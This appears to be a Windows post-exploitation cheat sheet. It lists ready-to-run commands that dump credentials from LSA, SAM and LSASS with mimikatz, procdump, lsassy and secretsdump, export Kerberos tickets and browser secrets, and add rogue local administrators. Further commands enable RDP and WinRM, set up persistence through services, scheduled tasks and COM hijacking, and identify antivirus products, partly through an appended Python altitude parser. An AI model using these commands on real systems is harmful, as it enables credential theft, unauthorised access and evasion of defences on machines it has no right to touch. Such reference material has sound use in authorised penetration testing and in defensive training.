Post-Ex Windows
Dump secrets
LSA
crackmapexec smb perim_up.txt -u '<user>' -d '<domain>' -p '<pass>' --lsa
SAM
crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> --sam
reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
LSASS
crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> -M lsassy
lsassy -d '.' -u 'Administrateur' -H '<hash>' <ip>
lsassy -d <domain> -u <user> -p <pass> <ip>
./spraykatz.py -u <user> -p <password> -t <ip>
pypykatz lsa minidump lsass.dmp
procdump.exe -accepteula -ma lsass c:\WINDOWS\Temp\lsass.txt
.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" exit
Kerberos
.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit
Browser secrets
sharpchrome.exe
https://github.com/login-securite/DonPAPI
DonPAPI.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
Create/add new local admin account
net user <user> <pass> /add
net localgroup "Administrators" <user> /add
Enable WinRM
Enable-PSRemoting -SkipNetworkProfileCheck -Force
Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
add user to RDP group
net localgroup "Remote Desktop Users" <user> /add
Create service
New-Service -BinaryPathName C:\Users\sqlServer\Documents\system2.exe -Name syshell -DisplayName syshell -StartupType Automatic
Start-Service syshell
sc \\127.0.0.1 create ServiceName binpath= "C:\windows\system32\calc.exe"
The \\192.168.1.2 host prefix is optional
To check that the service is working, you can reboot like this:
wmic /node:192.168.1.2 os get buildnumber
then
wmic /node:192.168.1.2 os where buildnumber="<Number>" call reboot
Execute binary using WMIC
wmic /node:127.0.0.1 process call create "C:\windows\system32\calc.exe"
/node is optional
Stop process
Run this to get the process ID: sc \\127.0.0.1 queryex ServiceName
then: wmic /node:127.0.0.1 process where processid=<PID> call terminate
/node is optional
or: taskkill /S 127.0.0.1 /PID <PID> /f
/S is optional
Create Scheduled tasks
schtasks /create /S 192.156.1.2 /tn <name> /sc once /sd 01/01/1910 /ru system /tr "C:\windows\system32\calc.exe"
Other
schtasks /create /S 127.0.0.1 /tn OBLIGE /tr "C:\windows\system32\calc.exe" /sc once /ST 18:30
/ru and /S are optional
To check that the task has been created, run: schtasks /s 192.156.1.2 /query /tn <name>
COM hijack
schtasks /query /xml > tasks.xml
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg export "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32" export.reg
# Edit export.reg: change the hive path to HKCU and change the DLL path
reg import export.reg /reg:64
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
Disconnect User
rwinsta /server:192.168.1.2 <sessionId>
To get the session ID, run:
qwinsta
Detecting the antivirus (AV)
Run fltmc
to get the list of minifilter altitudes, then look them up in the Windows documentation: https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes
For example, 389040 = SentinelOne
The AV range is: 320000 - 329998
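Added example, not part of the original cheat sheet: a small Python parser that takes saved `fltmc filters` output and maps each altitude to its load-order group, so the AV-range check above can be done offline on a listing. The altitude ranges are transcribed from the Microsoft page linked above (assumption: verify against it); the sample output is constructed.

```python
import re

# Load-order groups and altitude ranges, transcribed from the "Allocated altitudes"
# page linked above (assumption: check the live page for the full, current table).
ALTITUDE_GROUPS = [
    ("FSFilter Top", 400000, 409999),
    ("FSFilter Activity Monitor", 360000, 389999),
    ("FSFilter Undelete", 340000, 349999),
    ("FSFilter Anti-Virus", 320000, 329998),
    ("FSFilter Replication", 300000, 309999),
    ("FSFilter Continuous Backup", 280000, 289999),
    ("FSFilter Content Screener", 260000, 269999),
    ("FSFilter Encryption", 140000, 149999),
    ("FSFilter Open File", 100000, 109999),
    ("FSFilter Bottom", 40000, 49999),
    ("FSFilter System", 20000, 29999),
]

# Constructed sample of `fltmc filters` output (not captured from a real host).
SAMPLE_FLTMC = """\
Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
WdFilter                                3         328010         0
bindflt                                 1         409800         0
FileInfo                                3          45000         0
"""

# name, instance count, altitude (may carry a decimal part), frame
ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\d+(?:\.\d+)?)\s+(\S+)$")


def altitude_group(altitude):
    """Return the load-order group name for an integer altitude."""
    for name, lo, hi in ALTITUDE_GROUPS:
        if lo <= altitude <= hi:
            return name
    return "unknown"


def parse_fltmc(text):
    """Return [(filter_name, altitude, group)] for every filter row in the listing."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # header, separator or blank line
        name, _, alt, _ = m.groups()
        alt_int = int(float(alt))
        rows.append((name, alt_int, altitude_group(alt_int)))
    return rows


def antivirus_filters(text):
    """Names of filters whose altitude falls in the FSFilter Anti-Virus range."""
    return [n for n, _, g in parse_fltmc(text) if g == "FSFilter Anti-Virus"]
```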
It's also possible to identify the AV from the process list,
for example:
Microsoft Defender MSMpEng.exe
Trend Micro TMBMSRV.exe
Avira avguard.exe/Avira.ServiceHost.exe
Bitdefender bdagent.exe/vsserv.exe
Kaspersky avp.exe/ksde.exe
AVG AVGSvc.exe
Norton NortonSecurity.exe
McAfee MCAPExe.exe/mfemms.exe
Panda PavPrSvr.exe
Avast afwServ.exe/AvastSvc.exe